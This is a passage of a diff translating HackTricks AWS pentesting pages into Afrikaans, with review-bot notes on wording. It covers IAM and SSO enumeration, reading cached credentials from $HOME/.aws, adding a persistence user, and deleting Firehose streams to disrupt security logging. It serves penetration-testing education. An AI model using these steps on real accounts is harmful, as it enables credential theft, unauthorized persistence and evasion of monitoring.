@@ -191,12 +178,10 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions # [+] elbv2 Actions allowed are [+] # ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups'] ``` - -#### Hardening Tools to BF permissions +#### Versterking van Gereedskap om BF-toestemmings {{#tabs }} {{#tab name="CloudSploit" }} - ```bash # Export env variables ./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json @@ -207,11 +192,9 @@ jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json # Get services by regions jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json ``` - {{#endtab }} {{#tab name="SteamPipe" }} - ```bash # https://github.com/turbot/steampipe-mod-aws-insights steampipe check all --export=json @@ -220,15 +203,14 @@ steampipe check all --export=json # In this case you cannot output to JSON, so heck it in the dashboard steampipe dashboard ``` - {{#endtab }} {{#endtabs }} #### \ -Neither of the previous tools is capable of checking close to all permissions, so if you know a better tool send a PR! +Geen van die vorige gereedskap is in staat om naby al die toestemmings te kontroleer nie, so as jy 'n beter gereedskap ken, stuur 'n PR! -### Unauthenticated Access +### Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md @@ -236,7 +218,7 @@ Neither of the previous tools is capable of checking close to all permissions, s ### Privilege Escalation -In the following page you can check how to **abuse IAM permissions to escalate privileges**: +Op die volgende bladsy kan jy kyk hoe om **IAM-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-iam-privesc.md 
@@ -248,22 +230,21 @@ In the following page you can check how to **abuse IAM permissions to escalate p ../aws-post-exploitation/aws-iam-post-exploitation.md {{#endref}} -### IAM Persistence +### IAM Persistensie {{#ref}} ../aws-persistence/aws-iam-persistence.md {{#endref}} -## IAM Identity Center +## IAM Identiteitsentrum -You can find a **description of IAM Identity Center** in: +Jy kan 'n **beskrywing van IAM Identiteitsentrum** vind in: {{#ref}} ../aws-basic-information/ {{#endref}} -### Connect via SSO with CLI - +### Verbinding via SSO met CLI ```bash # Connect with sso via CLI aws configure sso aws configure sso @@ -274,20 +255,18 @@ sso_account_id = sso_role_name = AdministratorAccess sso_region = us-east-1 ``` - ### Enumeration -The main elements of the Identity Center are: +Die hoofelemente van die Identiteitsentrum is: -- Users and groups -- Permission Sets: Have policies attached -- AWS Accounts +- Gebruikers en groepe +- Toestemmingsstelle: Het beleide aangeheg +- AWS-rekeninge -Then, relationships are created so users/groups have Permission Sets over AWS Account. +Dan word verhoudings geskep sodat gebruikers/groepe Toestemmingsstelle oor AWS-rekening het. > [!NOTE] -> Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there). - +> Let daarop dat daar 3 maniere is om beleide aan 'n Toestemmingsstel te heg. Heg AWS bestuurde beleide, KliĂ«nt bestuurde beleide (hierdie beleide moet in al die rekeninge geskep word wat die Toestemmingsstel beĂŻnvloed), en inline beleide (gedefinieer daar). ```bash # Check if IAM Identity Center is used aws sso-admin list-instances 
@@ -321,11 +300,9 @@ aws identitystore list-group-memberships --identity-store-id --group- ## Get memberships or a user or a group aws identitystore list-group-memberships-for-member --identity-store-id --member-id ``` +### Plaaslike Enumerasie -### Local Enumeration - -It's possible to create inside the folder `$HOME/.aws` the file config to configure profiles that are accessible via SSO, for example: - +Dit is moontlik om binne die gids `$HOME/.aws` die lĂȘer config te skep om profiele te konfigureer wat via SSO toeganklik is, byvoorbeeld: ```ini [default] region = us-west-2 
@@ -343,20 +320,16 @@ output = json role_arn = arn:aws:iam:::role/ReadOnlyRole source_profile = Hacktricks-Admin ``` - -This configuration can be used with the commands: - +Hierdie konfigurasie kan gebruik word met die opdragte: ```bash # Login in ms-sso-profile aws sso login --profile my-sso-profile # Use dependent-profile aws s3 ls --profile dependent-profile ``` +Wanneer 'n **profiel van SSO gebruik word** om toegang tot sekere inligting te verkry, word die geloofsbriewe **in 'n lĂȘer in die gids **`$HOME/.aws/sso/cache`** gestoor. Daarom kan dit **gelees en daar gebruik word**. -When a **profile from SSO is used** to access some information, the credentials are **cached** in a file inside the folder **`$HOME/.aws/sso/cache`**. Therefore they can be **read and used from there**. - -Moreover, **more credentials** can be stored in the folder **`$HOME/.aws/cli/cache`**. This cache directory is primarily used when you are **working with AWS CLI profiles** that use IAM user credentials or **assume** roles through IAM (without SSO). Config example: - +Boonop kan **meer geloofsbriewe** in die gids **`$HOME/.aws/cli/cache`** gestoor word. Hierdie cache-gids word hoofsaaklik gebruik wanneer jy **met AWS CLI-profiele werk** wat IAM-gebruiker geloofsbriewe gebruik of **aanneem** rolle deur IAM (sonder SSO). Konfigurasie voorbeeld: ```ini [profile crossaccountrole] role_arn = arn:aws:iam::234567890123:role/SomeRole @@ -364,8 +337,7 @@ source_profile = default mfa_serial = arn:aws:iam::123456789012:mfa/saanvi external_id = 123456 ``` - -### Unauthenticated Access +### Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md 
@@ -383,24 +355,18 @@ external_id = 123456 ../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md {{#endref}} -### Persistence - -#### Create a user an assign permissions to it +### Volharding +#### Skep 'n gebruiker en ken toestemmings aan dit toe ```bash # Create user identitystore:CreateUser aws identitystore create-user --identity-store-id --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc ## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password ``` +- Skep 'n groep en ken dit toestemmings toe en stel 'n beheerde gebruiker daarop in +- Gee ekstra toestemmings aan 'n beheerde gebruiker of groep +- Standaard sal slegs gebruikers met toestemmings van die Bestuursrekening toegang hĂȘ tot en beheer oor die IAM Identiteitsentrum. -- Create a group and assign it permissions and set on it a controlled user -- Give extra permissions to a controlled user or group -- By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. - - However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html). +Dit is egter moontlik om via 'n Gedelegeerde Administrateur gebruikers van 'n ander rekening toe te laat om dit te bestuur. Hulle sal nie presies dieselfde toestemming hĂȘ nie, maar hulle sal in staat wees om [**bestuursaktiwiteite**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) uit te voer. {{#include ../../../banners/hacktricks-training.md}} - - - - 
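Review bot: In the enumerate-iam paragraph of hunk @@ -6, "met die gegewe akrediteer" uses a verb where the noun is needed; "credentials" is rendered "geloofsbriewe" later in this same file (hunk @@ -343), so "met die gegewe geloofsbriewe" keeps the terminology consistent. In the warning directly below it, "werk erger" should be "werk slegter" ("worse" in the sense of performing worse, not more severe). The hunk also deletes the blank line between the Cloudtrail2IAM code fence and the `> [!WARNING]` callout; that is whitespace churn unrelated to the translation and is best left as it was so the diff stays reviewable.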
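Review bot: The heading in hunk @@ -191 is mistranslated: "#### Versterking van Gereedskap om BF-toestemmings" reads as "strengthening of tools to BF permissions" and is not a grammatical phrase, whereas the English "Hardening Tools to BF permissions" means security-hardening/audit tools (the CloudSploit and Steampipe tabs that follow) repurposed to brute-force which permissions a set of credentials has. Suggest "#### Verhardingsgereedskap om toestemmings te brute-force", or leave the heading in English as the other tool headings in this file (enumerate-iam, weirdAAL, CloudSploit) are.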
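Review bot: In hunk @@ -236 the heading "### Privilege Escalation" is an unchanged context line, so it stays in English while the paragraph under it is translated and the neighbouring headings ("### Ongeauthentiseerde Toegang", "### IAM Persistensie") are Afrikaans; translate it as well ("### Voorregverhoging" or similar) so the section headings of the page are in one language. While here, "Ongeauthentiseerde" keeps the English/Dutch "th" spelling; the Afrikaans form is "Ongeoutentiseerde" (or "Ongeverifieerde") Toegang, and the same heading recurs in hunk @@ -364.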
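Review bot: In the NOTE callout of hunk @@ -274, "Heg AWS bestuurde beleide, KliĂ«nt bestuurde beleide ... en inline beleide" turns the gerund "Attaching AWS managed policies" into an imperative, so the three alternatives no longer read as a list; suggest "die heg van AWS-bestuurde beleide, kliĂ«ntbestuurde beleide (hierdie beleide moet in al die rekeninge geskep word ...) en inline beleide". Compound modifiers such as "AWS-bestuurde" and "kliĂ«ntbestuurde" are hyphenated or written together in Afrikaans, not as two words. The context heading "### Enumeration" in this hunk is left in English while the list beneath it is translated; the KMS file in this same PR renders the equivalent heading as "### Enumerasie", so use that here too.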
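Review bot: The added line in hunk @@ -343 has unbalanced bold markers: "word die geloofsbriewe **in 'n lĂȘer in die gids **`$HOME/.aws/sso/cache`** gestoor" contains three `**` sequences, so the emphasis opened before "in 'n lĂȘer" is never closed and the paragraph renders bold from there onward. The English is "are **cached** in a file inside the folder **`$HOME/.aws/sso/cache`**"; suggest "word die geloofsbriewe **gekas** in 'n lĂȘer binne die gids **`$HOME/.aws/sso/cache`**", which also restores the point that these are cached credentials, not merely stored ones. In the next paragraph "wat IAM-gebruiker geloofsbriewe gebruik of **aanneem** rolle deur IAM" needs verb-final order: "of rolle deur IAM **aanneem**".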
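Review bot: Hunk @@ -383 renders "### Persistence" as "### Volharding", while hunk @@ -248 in the same file uses "### IAM Persistensie" for the same concept; pick one term ("Persistensie") so readers find the section under the same name throughout the page. The reordering of the three `+` bullets above the removed `-` lines is only a diff-ordering artefact and does not change the rendered result. Small plus: "met toestemmings van die Bestuursrekening" silently fixes the English source's "permissions form the Management Account"; consider carrying that "from" fix back to the English page as well.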
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md index 6ca66b5ed..9349898cd 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md 
@@ -4,12 +4,11 @@ ## Kinesis Data Firehose -Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. +Amazon Kinesis Data Firehose is 'n **volledig bestuurde diens** wat die aflewering van **regstreekse stroomdata** fasiliteer. Dit ondersteun 'n verskeidenheid bestemmings, insluitend Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, en pasgemaakte HTTP-eindpunte. -The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. +Die diens verlig die behoefte om toepassings te skryf of hulpbronne te bestuur deur data produsente toe te laat om gekonfigureer te word om data direk na Kinesis Data Firehose te stuur. Hierdie diens is verantwoordelik vir die **outomatiese aflewering van data na die gespesifiseerde bestemming**. Daarbenewens bied Kinesis Data Firehose die opsie om die **data voor sy aflewering te transformeer**, wat die buigsaamheid en toepaslikheid daarvan vir verskeie gebruiksgevalle verbeter. ### Enumeration - ```bash # Get delivery streams aws firehose list-delivery-streams 
@@ -19,37 +18,26 @@ aws firehose describe-delivery-stream --delivery-stream-name ## Get roles aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN ``` - ## Post-exploitation / Defense Bypass -In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. +In die geval dat firehose gebruik word om logs of verdediging insigte te stuur, kan 'n aanvaller deur hierdie funksies te gebruik, verhoed dat dit behoorlik werk. ### firehose:DeleteDeliveryStream - ``` aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete ``` - ### firehose:UpdateDestination - ``` aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id ``` - ### firehose:PutRecord | firehose:PutRecordBatch - ``` aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json ``` - -## References +## Verwysings - [https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md index 543ed31cd..c5965741d 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md 
@@ -2,128 +2,125 @@ {{#include ../../../banners/hacktricks-training.md}} -## KMS - Key Management Service +## KMS - Sleutelbestuurdiens -AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. +AWS Sleutelbestuurdiens (AWS KMS) word aangebied as 'n bestuurde diens, wat die proses vir gebruikers vereenvoudig om **klant meester sleutels** (CMKs) te **skep en te bestuur**. Hierdie CMKs is integraal in die versleuteling van gebruikersdata. 'n Opmerkelijke kenmerk van AWS KMS is dat CMKs hoofsaaklik **beveilig word deur hardeware sekuriteitsmodules** (HSMs), wat die beskerming van die versleuteling sleutels verbeter. -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. +KMS gebruik **simmetriese kriptografie**. Dit word gebruik om **inligting in rus te versleutelen** (byvoorbeeld, binne 'n S3). As jy **inligting in oordrag wil versleutelen**, moet jy iets soos **TLS** gebruik. -KMS is a **region specific service**. +KMS is 'n **streekspesifieke diens**. -**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. +**Administrateurs by Amazon het nie toegang tot jou sleutels nie**. Hulle kan nie jou sleutels herstel nie en hulle help jou nie met die versleuteling van jou sleutels nie. 
AWS bestuur eenvoudig die bedryfstelsel en die onderliggende toepassing; dit is aan ons om ons versleuteling sleutels te bestuur en te bestuur hoe daardie sleutels gebruik word. -**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. +**Klant Meester Sleutels** (CMK): Kan data tot 4KB in grootte versleutelen. Hulle word tipies gebruik om die DEKs (Data Versleuteling Sleutels) te skep, versleutelen en ontsleutelen. Dan word die DEKs gebruik om die data te versleutelen. -A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. +'n Klant meester sleutel (CMK) is 'n logiese voorstelling van 'n meester sleutel in AWS KMS. Benewens die meester sleutel se identifiseerders en ander metadata, insluitend sy skeppingsdatum, beskrywing en sleuteltoestand, **bevat 'n CMK die sleutelmateriaal wat gebruik word om data te versleutelen en ontsleutelen**. Wanneer jy 'n CMK skep, genereer AWS KMS standaard die sleutelmateriaal vir daardie CMK. Jy kan egter kies om 'n CMK sonder sleutelmateriaal te skep en dan jou eie sleutelmateriaal in daardie CMK te invoer. -There are 2 types of master keys: +Daar is 2 tipes meester sleutels: -- **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. 
-- **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. +- **AWS bestuurde CMKs: Gebruik deur ander dienste om data te versleutelen**. Dit word gebruik deur die diens wat dit in 'n streek geskep het. Hulle word geskep die eerste keer wat jy die versleuteling in daardie diens implementeer. Dit draai elke 3 jaar en dit is nie moontlik om dit te verander nie. +- **Klant bestuurder CMKs**: Buigsaamheid, rotasie, konfigureerbare toegang en sleutelbeleid. Aktiveer en deaktiveer sleutels. -**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. +**Envelope Versleuteling** in die konteks van Sleutelbestuurdiens (KMS): Twee-laag hiĂ«rargie stelsel om **data met data sleutel te versleutelen en dan data sleutel met meester sleutel te versleutelen**. -### Key Policies +### Sleutelbeleide -These defines **who can use and access a key in KMS**. +Hierdie definieer **wie 'n sleutel in KMS kan gebruik en toegang hĂȘ**. -By **default:** +Deur **standaard:** -- It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. +- Dit gee die **IAM van die** **AWS rekening wat die KMS sleutel besit toegang** om die toegang tot die KMS sleutel via IAM te bestuur. - Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. +In teenstelling met ander AWS hulpbronbeleide, 'n AWS **KMS sleutelbeleid gee nie outomaties toestemming aan enige van die principals van die rekening nie**. Om toestemming aan rekening administrateurs te gee, moet die **sleutelbeleid 'n eksplisiete verklaring insluit** wat hierdie toestemming bied, soos hierdie een. 
- - Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. +- Sonder om die rekening toe te laat (`"AWS": "arn:aws:iam::111122223333:root"`) sal IAM toestemmings nie werk nie. -- It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. +- Dit **laat die rekening toe om IAM beleide te gebruik** om toegang tot die KMS sleutel toe te laat, benewens die sleutelbeleid. - **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. +**Sonder hierdie toestemming is IAM beleide wat toegang tot die sleutel toelaat, ondoeltreffend**, alhoewel IAM beleide wat toegang tot die sleutel ontken steeds doeltreffend is. -- It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. - -**Default policy** example: +- Dit **verlaag die risiko dat die sleutel onbestuurbaar word** deur toegangbeheer toestemming aan die rekening administrateurs te gee, insluitend die rekening wortel gebruiker, wat nie verwyder kan word nie. +**Standaard beleid** voorbeeld: ```json { - "Sid": "Enable IAM policies", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::111122223333:root" - }, - "Action": "kms:*", - "Resource": "*" +"Sid": "Enable IAM policies", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::111122223333:root" +}, +"Action": "kms:*", +"Resource": "*" } ``` - > [!WARNING] -> If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. 
+> As die **rekening toegelaat is** (`"arn:aws:iam::111122223333:root"`) sal 'n **hoofpersoon** van die rekening **nog steeds IAM-toestemmings nodig hĂȘ** om die KMS-sleutel te gebruik. As die **ARN** van 'n rol byvoorbeeld **spesifiek toegelaat is** in die **Sleutelbeleid**, het daardie rol **nie IAM-toestemmings nodig nie**.
-Policy Details +Beleid Besonderhede -Properties of a policy: +Eienskappe van 'n beleid: -- JSON based document -- Resource --> Affected resources (can be "\*") -- Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) -- Effect --> Allow/Deny -- Principal --> arn affected -- Conditions (optional) --> Condition to give the permissions +- JSON-gebaseerde dokument +- Hulpbron --> Aangetaste hulpbronne (kan wees "\*") +- Aksie --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (toestemmings) +- Effek --> Toelaat/Weier +- Hoofpersoon --> arn aangetaste +- Voorwaardes (opsioneel) --> Voorwaarde om die toestemmings te gee -Grants: +Toekennings: -- Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) -- After the grant is created a GrantToken and a GratID are issued +- Laat toe om jou toestemmings aan 'n ander AWS-hoofpersoon binne jou AWS-rekening te delegeer. Jy moet dit skep met die AWS KMS API's. Dit kan die CMK-identifiseerder, die toekenningshoofpersoon en die vereiste vlak van operasie (Decrypt, Encrypt, GenerateDataKey...) aangedui word. +- Nadat die toekenning geskep is, word 'n GrantToken en 'n GrantID uitgereik. -**Access**: +**Toegang**: -- Via **key policy** -- If this exist, this takes **precedent** over the IAM policy -- Via **IAM policy** -- Via **grants** +- Via **sleutelbeleid** -- As dit bestaan, het dit **prioriteit** bo die IAM-beleid +- Via **IAM-beleid** +- Via **toekennings**
-### Key Administrators +### Sleutel Administrators -Key administrator by default: +Sleuteladministrateur per standaard: -- Have access to manage KMS but not to encrypt or decrypt data -- Only IAM users and roles can be added to Key Administrators list (not groups) -- If external CMK is used, Key Administrators have the permission to import key material +- Het toegang om KMS te bestuur, maar nie om data te enkripteer of te dekripteer nie +- Slegs IAM-gebruikers en rolle kan by die Sleuteladministratorslys gevoeg word (nie groepe nie) +- As 'n eksterne CMK gebruik word, het Sleuteladministrators die toestemming om sleutelmateriaal te invoer -### Rotation of CMKs +### Rotasie van CMK's -- The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. -- **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. -- **Older keys are retained** to decrypt data that was encrypted prior to the rotation -- In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. -- If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. +- Hoe langer dieselfde sleutel in plek gelaat word, hoe meer data word met daardie sleutel geĂ«nkripteer, en as daardie sleutel gecompromitteer word, is die blast area van data wyer in gevaar. Benewens dit, hoe langer die sleutel aktief is, hoe groter is die waarskynlikheid dat dit gecompromitteer sal word. 
+- **KMS roteer kliĂ«ntsleutels elke 365 dae** (of jy kan die proses handmatig uitvoer wanneer jy wil) en **sleutels bestuur deur AWS elke 3 jaar** en hierdie tyd kan nie verander word nie. +- **Ou sleutels word behou** om data te dekripteer wat voor die rotasie geĂ«nkripteer is. +- In 'n breek, sal die rotasie van die sleutel nie die bedreiging verwyder nie, aangesien dit moontlik sal wees om al die data wat met die gecompromitteerde sleutel geĂ«nkripteer is, te dekripteer. Tog, die **nuwe data sal geĂ«nkripteer word met die nuwe sleutel**. +- As **CMK** in 'n toestand van **gedeaktiveer** of **hangende** **verwydering** is, sal KMS **nie 'n sleutelrotasie uitvoer nie** totdat die CMK heraktiveer of die verwydering gekanselleer word. -#### Manual rotation +#### Handmatige rotasie -- A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -- To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -- You need to **keep old keys to decrypt old files** encrypted with it. +- 'n **Nuwe CMK moet geskep word**, dan, 'n nuwe CMK-ID word geskep, so jy sal **moet opdateer** enige **aansoek** om die nuwe CMK-ID te **verwys**. +- Om hierdie proses makliker te maak, kan jy **aliases gebruik om na 'n sleutel-id te verwys** en dan net die sleutel wat die alias verwys, opdateer. +- Jy moet **ou sleutels hou om ou lĂȘers te dekripteer** wat daarmee geĂ«nkripteer is. -You can import keys from your on-premises key infrastructure . +Jy kan sleutels van jou plaaslike sleutel-infrastruktuur invoer. -### Other relevant KMS information +### Ander relevante KMS-inligting -KMS is priced per number of encryption/decryption requests received from all services per month. +KMS word geprys per aantal enkripsie/dekripsie versoeke wat van alle dienste per maand ontvang word. 
-KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. +KMS het volle oudit en nakoming **integrasie met CloudTrail**; dit is waar jy al die veranderinge wat op KMS uitgevoer is, kan oudit. -With KMS policy you can do the following: +Met KMS-beleid kan jy die volgende doen: -- Limit who can create data keys and which services have access to use these keys -- Limit systems access to encrypt only, decrypt only or both -- Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). +- Beperk wie data sleutels kan skep en watter dienste toegang het om hierdie sleutels te gebruik +- Beperk stelsels se toegang om slegs te enkripteer, slegs te dekripteer of albei +- Definieer om stelsels toe te laat om sleutels oor streke te benader (alhoewel dit nie aanbeveel word nie, aangesien 'n mislukking in die streek wat KMS huisves, die beskikbaarheid van stelsels in ander streke sal beĂŻnvloed). -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. - -### Enumeration +Jy kan nie sleutels oor streke sinkroniseer of beweeg/kopieer nie; jy kan slegs reĂ«ls definieer om toegang oor streke toe te laat. +### Enumerasie ```bash aws kms list-keys aws kms list-key-policies --key-id @@ -132,7 +129,6 @@ aws kms describe-key --key-id aws kms get-key-policy --key-id --policy-name # Default policy name is "default" aws kms describe-custom-key-stores ``` - ### Privesc {{#ref}} @@ -151,12 +147,8 @@ aws kms describe-custom-key-stores ../aws-persistence/aws-kms-persistence.md {{#endref}} -## References +## Verwysings - [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) {{#include ../../../banners/hacktricks-training.md}} - - - - 
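Review bot: In hunk @@ -4 of aws-kinesis-data-firehose-enum.md, "data produsente" should be the compound "dataprodusente", and the context heading "### Enumeration" stays in English although the paragraphs above it are translated; the KMS page in this PR uses "### Enumerasie", so match that.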
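Review bot: In hunk @@ -19 of the Firehose page, "logs of verdediging insigte" should be the compound "verdedigingsinsigte", and the context heading "## Post-exploitation / Defense Bypass" is left untranslated while its paragraph is translated; the English heading that follows it ("## References" to "## Verwysings") is translated, so this one should be too. The rest of the hunk only removes blank lines between the sub-headings and their code fences, which does not change rendering but adds noise to the diff.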
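Review bot: Hunk @@ -2 of aws-kms-enum.md strips the indentation of the default key-policy JSON: every line of the example (`"Sid": "Enable IAM policies",` through `"Resource": "*"`) is re-added flush left, a formatting regression unrelated to the translation that makes the policy structure harder to read; restore the original two-space nesting. The prose mixes Dutch and Afrikaans spelling within the same hunk: "versleutelen", "Opmerkelijke" and "gecompromitteer" in the first half, while the Rotation section further down the same hunk already uses the Afrikaans "enkripteer"/"dekripteer"; use "enkripteer", "opmerklike" and "gekompromitteer" throughout. "Klant bestuurder CMKs" carries over the source typo "Customer manager CMKs" and should read "Klantbestuurde CMKs" (customer managed), matching "AWS bestuurde CMKs" in the preceding bullet. Finally, "Dit draai elke 3 jaar" uses "draai" (turn/spin) for "rotates"; the rotation bullets use "roteer", so "Dit roteer elke 3 jaar" is the consistent choice.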
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md index 03fa1aac8..4b2172713 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md 
@@ -4,59 +4,58 @@ ## Lambda -Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations. +Amazon Web Services (AWS) Lambda word beskryf as 'n **rekenaar diens** wat die uitvoering van kode moontlik maak sonder die noodsaaklikheid van bediener voorsiening of bestuur. Dit word gekenmerk deur sy vermoĂ« om **outomaties hulpbronne toe te ken** wat nodig is vir kode uitvoering, wat funksies soos hoĂ« beskikbaarheid, skaalbaarheid en sekuriteit verseker. 'n Belangrike aspek van Lambda is sy prysmodel, waar **heffings slegs gebaseer is op die rekenaartyd wat gebruik word**, wat die noodsaaklikheid van aanvanklike belegging of langtermyn verpligtinge uitskakel. -To call a lambda it's possible to call it as **frequently as you wants** (with Cloudwatch), **expose** an **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in a **S3** bucket or updates to a **DynamoDB** table. +Om 'n lambda aan te roep, is dit moontlik om dit **so gereeld soos jy wil** aan te roep (met Cloudwatch), **'n URL** eindpunt bloot te stel en dit aan te roep, dit via **API Gateway** aan te roep of selfs gebaseer op **gebeurtenisse** soos **veranderings** aan data in 'n **S3** emmer of opdaterings aan 'n **DynamoDB** tabel. -The **code** of a lambda is stored in **`/var/task`**. +Die **kode** van 'n lambda word gestoor in **`/var/task`**. ### Lambda Aliases Weights -A Lambda can have **several versions**.\ -And it can have **more than 1** version exposed via **aliases**. 
